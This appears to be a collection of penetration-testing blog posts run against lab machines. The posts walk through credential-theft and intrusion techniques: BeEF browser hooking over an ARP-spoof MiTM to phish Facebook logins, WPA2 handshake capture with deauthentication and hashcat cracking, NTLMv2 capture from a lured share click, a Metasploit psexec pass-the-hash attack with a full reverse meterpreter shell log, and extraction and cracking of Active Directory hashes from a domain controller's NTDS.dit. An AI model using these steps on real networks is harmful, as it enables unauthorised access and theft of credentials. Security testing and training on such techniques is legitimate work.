Browser Hooking + Credential Theft

The purpose of this post is to demonstrate how credentials can be stolen by combining 3 techniques: Man-in-The-Middle (MiTM) attack, Browser Hooking, and Social Engineering.

The setup here is that an attacker has (theoretically) gained access to the victim’s network.  Obviously there are many ways this could be accomplished but it could be as simple as the attacker and the victim using the same wireless network at a coffee shop.

Attacker box is running Kali Linux with an IP address of 172.17.130.69
Victim is running a fully patched Windows 7 OS with fully patched IE 11  with an IP address of 172.17.130.44

The first thing we do is start up the BeEF Framework on our Kali box. BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.

Capture1

After it’s running, we need to make note of the “Hook URL” and the “UI URL” that begin with 172.X.X.X.

Capture2

We login to the BeEF Framework website by browsing to the “UI URL” that we made note of in the previous step.  The default username/password is: beef/beef

Capture3

Once logged in, we see the below screen.

Capture4

Inside another terminal (don’t close the one used to start up BeEF), we need to discover the default gateway on the network and also a victim in order to perform the MiTM attack. The below command will give us the info we need.

Capture5

We can also now nmap the subnet to find a suitable victim.

Capture6

Rather than unnecessarily disclose an entire subnet’s worth of devices for this post, I’m choosing to focus on my Windows 7 test box, which is listed below.

Capture7

We now have sufficient information to implement our MiTM attack while also simultaneously injecting the “Hook URL” into the victim’s packet stream. The technique used to achieve the MiTM attack is a simple ARP spoof.  MiTMf (as seen in the terminal window below) is the tool used to achieve both attacks.  I don’t believe this comes with Kali Linux and  can be downloaded/installed using apt-get install mitmf (I think).

Capture8

Below is the output of the executed command.

Capture9

On our Windows 7 box, we can see/verify/note it’s IP configuration.

Capture10

Again, on our Window’s 7 box, we open IE 11 – which stupidly defaults to non-secured MSN homepage…

Capture10.2

As we do that, we can see on our Kali box that the browser has now been effectively “hooked”.

Capture11

Now that the browser has been hooked, we have many options available to use within the BeEF Framework. Below I’ve chosen to use a module that will attempt to “trick” (social engineering) the victim into inputting their Facebook credentials into a pop-up window.

Capture12.2

Back on our Windows 7 box, we see that the browser has been presented the victim with the credential box.

Capture13

If the victim inputs anything into the input fields, that data is captured and able to viewed within BeEF – as seen below.

Capture14

Advertisements

Cracking WPA2 Personal PSKs

Below is the process I use for testing the strength of a wireless network’s password (WPA2 Personal in this example). This guide is intended for someone who already has a working knowledge of Kali Linux and an external WIFI adapter that is capable of operating in monitor mode and also capable of packet injection.

With my WIFI adapter connected, we can see that it’s listed as wlan0.

Capture1

We type airmon-ng to make sure our adapter is listed in the output.  If not, resolve that issue before proceeding.

Capture2

We gathered the name of the wireless interface from the first step, so we can now type the below command.  Notice the the interface name has now changed to wlan0mon.  Make note of what it changes to, as it it will be needed later.

Capture3

Ifconfig confirms the interface name change as mentioned above.

Capture4

The below command will list all of the wireless networks in the vicinity of the wireless adapter.

Capture5

Below is the list of available wireless networks.  In this example, we are targeting the wireless network named “Nick’s iPhone”.  We need to make note the the BSSID and the channel.

Capture6

We copy out the BSSID so that we don’t have to type it in manually.

Capture7

To monitor only the target network (Nick’s iPhone in this example), issue the below command:

Capture8

We can see that there is a single device connected (listed under station).

Capture9

From here, we need to open a new terminal and issue the below command.  The command will send two “deauth” packets to the device/station connected to the wireless network named Nick’s iPhone.  When this happens, the device will be disconnected and will typically try to automatically reconnect.  When the device reconnected, we should (hopefully) capture the WPA2 4-way handshake.

Capture10

In the top right hand side of the original terminal window we should see “WPA handshake” when the device has successfully reconnected. There will also be capture files on the desktop as well.

Capture11

Issue the below command.  Note: When using wpaclean, you must list the name of the OUTPUT file first.  This is confusing.  The name can be anything, but the output file comes first.

Capture12

As we are using hashcat to brute force the PSK, we need to convert the capture files into a format that is usable by hashcat.

Capture13

A continuation of the above screen shot:

Capture14

Below is the hashcat command needed to attempt to brute force the PSK against your favorite wordlists.  As we can see below, the password was found in the wordlist and the WIFI password for the target is: wireless123.

Capture15

Capturing And Cracking NTLMv2 Hashes On The LAN

Target Name: John Doe
Target box: 172.17.130.111 (domain joined)
Attack/facilitator box: 172.17.130.76 (Kali Linux)
Wireshark box: 172.17.130.76 (Kali Linux)

With a comprised host on the network, the idea is to get an unsuspecting victim to click a link to a network share from their workstation. As a result, when they do, it will ultimately pass NTLM challenge/response packets which can be captured and viewed using Wireshark.  Below is the process for capturing such packets, rebuilding them into a format that is usable by hashcat for the purposes of cracking their Active Directory password.

First the “victim” (John Doe) must be convinced to click on a link.  This really isn’t all that difficult but outside of the scope of this document.  Consider an email message with a link to \\172.17.130.76 (attacker/facilitator machine). Prior to clicking, we want Wireshark to be open and listening on the appropriate interface in order to capture the required packets.

Capture1

The quickest way to find the packets we are most concerned with is to setup a filter for “ntlmssp”.  From there, we only need two packets: The highlighted line, and the one directly below it.

Capture2

At this point, we want to have a text editor open so that we can copy the values from the below screenshots as plain text.  After everything is pasted into the editor, it will need to be rearranged into a particular order.

Capture3

It is important to capture the NTLMv2 Response as “Hex Stream”.

Capture4

Below is an example of the information one would need to properly built the challenge/response information back into a format that is able to be cracked. The domain username and domain name can be gleaned from the NTLMSSP_AUTH packet (2nd one in the original screenshot)  The most important thing to notice is the location of the colons. Specifically, there MUST be a colon after the first 32 bits of the NTLM RESPONCE.  This usually where you will notice a few 010101’s. Also, notice the double colons (::) after the domain username too.

Capture5

This entire string needs to be saved into a single line text file (again, remember the placement of the colons):

Capture6

Once in a text file, this file can be piped through hashcat and against your favorite wordlists using the following command:

hashcat -m 5600 asdf.txt wordlist.txt

Capture7

As seen in the screengrab above, the password for John Doe’s AD account is “Summer2016”

 

 

 

Pass The Hash Reverse Shell With Metasploit

Kali: 173.18.131.94
Victim: 173.18.131.111

root@kali:/usr/bin# ./msfconsole
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set lhost 173.18.131.94
lhost => 173.18.131.94
msf exploit(psexec) > set rhost 173.18.131.111
rhost => 173.18.131.111
msf exploit(psexec) > set smbpass 00000000000000000000000000000000:b048b97d9fdb66d3d2ed72b3782847a4
smbpass => 00000000000000000000000000000000:b048b97d9fdb66d3d2ed72b3782847a4
msf exploit(psexec) > set smbuser administrator
smbuser => administrator
msf exploit(psexec) > set smbdomain test
smbdomain => test
msf exploit(psexec) > exploit

[*] Started reverse TCP handler on 173.18.131.94:4444
[*] Connecting to the server…
[*] Authenticating to 173.18.131.111:445|test as user ‘administrator’…
[*] Selecting PowerShell target
[*] 173.18.131.111:445 – Executing the payload…
[+] 173.18.131.111:445 – Service start timed out, OK if running a command or non-service executable…
[*] Sending stage (957487 bytes) to 173.18.131.111
[*] Meterpreter session 1 opened (173.18.131.94:4444 -> 173.18.131.111:49811) at 2016-03-09 16:44:58 -0500

meterpreter > shell
Process 2212 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Extracting & Cracking NTLM Hashes

I’ve been working on coming up with an efficient and repeatable method for auditing Active Directory passwords during network assessments, and below is process that I’ve found to be quite workable. Below is the high-level overview:

  1. Extract the NTDS database from the Windows Domain Controller
  2. Decompile the NTDS database into a useable format
  3. Extract the hashes from the tables
  4. Crack the hashes

Below is more detailed explanation and breakdown of the process:

  1. On a Windows DC, the file containing the valuable data is named NTDS.dit and typically resides in C:\windows\NTDS but you may find it elsewhere. You also need the SYSTEM file located in c:\windows\system32\config as well. Microsoft doesn’t make it particularly easy to snag these files, but one method that works is to create a volume shadow copy (not explained here, but relatively easy) and then extract the required files from the backup to a USB drive or some other media.
  2.  I then copied those two files (from the Windows DC) from the USB drive to /root/Desktop/NTDS on my Kali box
  3. I also needed two additional tools, which do not come standard with Kali: NTDSXtract and libesedb.
  4. How to get/install/use Libesedb:
    1. wget https://github.com/libyal/libesedb/archive/5d9a91340cfaeae344d989bb613db495e82b512f.zip
    2. unzip 5d9a91340cfaeae344d989bb613db495e82b512f.zip
    3. cd libesedb-5d9a91340cfaeae344d989bb613db495e82b512f/
    4. apt-get install git autoconf automake autopoint libtool pkg-config build-essential
    5. ./synclibs.sh
    6. ./autogen.sh
    7. ./configure
    8. make
    9. make install
    10. ldconfig
    11. From /usr/local/bin, I issued the following command: esedbexport -m tables /root/Desktop/NTDS/ntds.dit
    12. This will create a new folder in /usr/local/bin called “ntds.dit.export” which will contain about 14 files.
    13. Capture2
  5. How to get/install/use NTDSXtract:
    1. wget https://github.com/csababarta/ntdsxtract/archive/e2fc6470cf54d9151bed394ce9ad3cd25be7c262.zip
    2. unzip e2fc6470cf54d9151bed394ce9ad3cd25be7c262.zip
    3. cd ntdsxtract-e2fc6470cf54d9151bed394ce9ad3cd25be7c262.zip/
    4. root@kali:~/root/Downloads/ntdsxtract-e2fc6470cf54d9151bed394ce9ad3cd25be7c262# python dsusers.py /usr/local/bin/ntds.dit.export/datatable.4 /usr/local/bin/ntds.dit.export/link_table.7 /root/Desktop/NTDS/hashdump –syshive /root/Desktop/NTDS/SYSTEM –passwordhashes –lmoutfile /root/Desktop/NTDS/lm-out.txt –ntoutfile /root/Desktop/NTDS/ntlm_hashes.txt –pwdformat ophc
  6. The above will output a text file in /root/Desktop/NTDS named “ntlm_hashes.txt”. Each line in the file should read something like:  jdoe:::2fd619f31242602547e7e8873241a02a:S-1-5-21-584645546-2734198843-167788419-1105::
    1. I made a backup copy of the file and created a new/blank file (i.e. “ntlm_hashes_stripped.txt” only kept only the following from the above: 2fd619f31242602547e7e8873241a02
    2. Capture3
    3. I then used hashcat to bruteforce the hashes: hashcat –m 1000 –a 0 /root/Desktop/NTDS/ntlm_hashes_stripped.txt /usr/share/wordlists/wordlist.txt

The output should look something like the below:

Capture1

Happy password cracking.